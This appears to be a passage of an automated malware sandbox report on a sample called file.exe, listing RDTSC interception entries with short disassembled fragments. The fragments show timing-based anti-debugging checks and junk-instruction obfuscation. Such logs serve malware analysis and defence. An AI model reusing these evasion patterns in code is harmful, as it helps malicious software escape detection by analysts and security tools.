Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48154F second address: 481592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA9551579FDh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FA955157A25h 0x00000012 jmp 00007FA9551579FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007FA9551579F6h 0x0000001f jmp 00007FA955157A03h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481844 second address: 48184B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48184B second address: 481853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4819F0 second address: 4819F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481B0E second address: 481B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA955157A01h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481B2A second address: 481B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481B2E second address: 481B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481DF0 second address: 481DFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481DFB second address: 481E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481E04 second address: 481E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481E1E second address: 481E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d js 00007FA9551579F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481E31 second address: 481E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA954E703D4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481E56 second address: 481E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481E5C second address: 481E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47A484 second address: 47A4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA955157A06h 0x0000000b popad 0x0000000c jmp 00007FA9551579FDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47A4AE second address: 47A4CB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA954E703D7h 0x00000008 jmp 00007FA954E703D1h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47A4CB second address: 47A4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44BFE4 second address: 44BFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481FA2 second address: 481FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FA9551579FAh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481FB4 second address: 481FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48282F second address: 482833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482977 second address: 482985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FA954E703CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482985 second address: 482989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482989 second address: 48298F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48298F second address: 482999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA9551579F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482999 second address: 48299D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48299D second address: 4829A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4829A3 second address: 4829C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007FA954E703C6h 0x00000011 jmp 00007FA954E703CDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4829C3 second address: 4829D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA9551579FAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4829D2 second address: 4829DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA954E703C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48709F second address: 4870BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FA955157A12h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 452CE0 second address: 452CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 452CE6 second address: 452CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 452CEC second address: 452CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 452CF5 second address: 452D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9551579FAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BC37 second address: 48BC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BC3B second address: 48BC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA9551579F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BC45 second address: 48BC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F722 second address: 48F727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F727 second address: 48F746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703D7h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F88C second address: 48F890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F890 second address: 48F894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F894 second address: 48F8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA955157A1Ch 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F8A3 second address: 48F8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48FB96 second address: 48FB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48FB9C second address: 48FBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48FBA2 second address: 48FBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48FBA6 second address: 48FBAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48FBAA second address: 48FBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA9551579FEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4900CA second address: 4900D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493E90 second address: 493E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493E94 second address: 493E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493E98 second address: 493E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493F5B second address: 493F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493F5F second address: 493F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jnp 00007FA9551579F8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493F75 second address: 493F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4942B6 second address: 4942BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 494376 second address: 49437A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49437A second address: 49437E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49437E second address: 494384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4945D8 second address: 4945FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FA955157A0Ch 0x00000011 jmp 00007FA955157A06h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4945FF second address: 494606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 494B5F second address: 494B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 494C52 second address: 494C5C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4950C6 second address: 4950CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4950CF second address: 4950D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4950D3 second address: 495120 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FA9551579F8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 movzx edi, ax 0x00000027 mov dword ptr [ebp+122D363Bh], edx 0x0000002d push ebx 0x0000002e push edi 0x0000002f jbe 00007FA9551579F6h 0x00000035 pop edi 0x00000036 pop esi 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA9551579FEh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 495120 second address: 495124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 495124 second address: 49512A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49512A second address: 49512F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4971FD second address: 497203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 497A4E second address: 497A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FA954E703C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49889F second address: 4988A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499401 second address: 49940B instructions: 0x00000000 rdtsc 0x00000002 je 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49940B second address: 4994BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA955157A07h 0x00000010 pushad 0x00000011 jmp 00007FA955157A03h 0x00000016 jmp 00007FA9551579FEh 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e mov di, F5F4h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FA9551579F8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FA9551579F8h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 jmp 00007FA955157A03h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49AA41 second address: 49AA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D555 second address: 49D55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E65A second address: 49E65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49E65E second address: 49E66C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FA9551579F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4510B7 second address: 4510BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4510BB second address: 4510DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA9551579F6h 0x0000000e jmp 00007FA955157A04h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0498 second address: 4A04AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FA954E703C8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4510DD second address: 4510E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A04AA second address: 4A04B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3857 second address: 4A385B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A385B second address: 4A385F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A385F second address: 4A3895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, di 0x0000000d push 00000000h 0x0000000f mov bh, cl 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 mov edi, dword ptr [ebp+122D3569h] 0x0000001a pop edi 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA955157A07h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2A10 second address: 4A2A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2A2C second address: 4A2A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FA9551579F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A48A6 second address: 4A48AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3A43 second address: 4A3A48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A49C4 second address: 4A49E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6D16 second address: 4A6D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, dword ptr [ebp+122D31F5h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FA9551579F8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+1246DF2Ch] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007FA9551579F8h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D38A8h] 0x00000052 mov dword ptr [ebp+124427E8h], ecx 0x00000058 xchg eax, esi 0x00000059 jp 00007FA955157A07h 0x0000005f jnl 00007FA955157A01h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A49E0 second address: 4A4A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA954E703D2h 0x00000008 jne 00007FA954E703C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jng 00007FA954E703CFh 0x00000018 pushad 0x00000019 mov edi, edx 0x0000001b mov ecx, 0AA010DAh 0x00000020 popad 0x00000021 push dword ptr fs:[00000000h] 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FA954E703C8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 and ebx, 0AC7CE3Eh 0x00000048 jnp 00007FA954E703CCh 0x0000004e mov dword ptr [ebp+122D2FA8h], esi 0x00000054 mov dword ptr fs:[00000000h], esp 0x0000005b mov edi, esi 0x0000005d mov eax, dword ptr [ebp+122D0A55h] 0x00000063 or dword ptr [ebp+122D2ACBh], eax 0x00000069 push FFFFFFFFh 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6D95 second address: 4A6D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A4A6F second address: 4A4A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
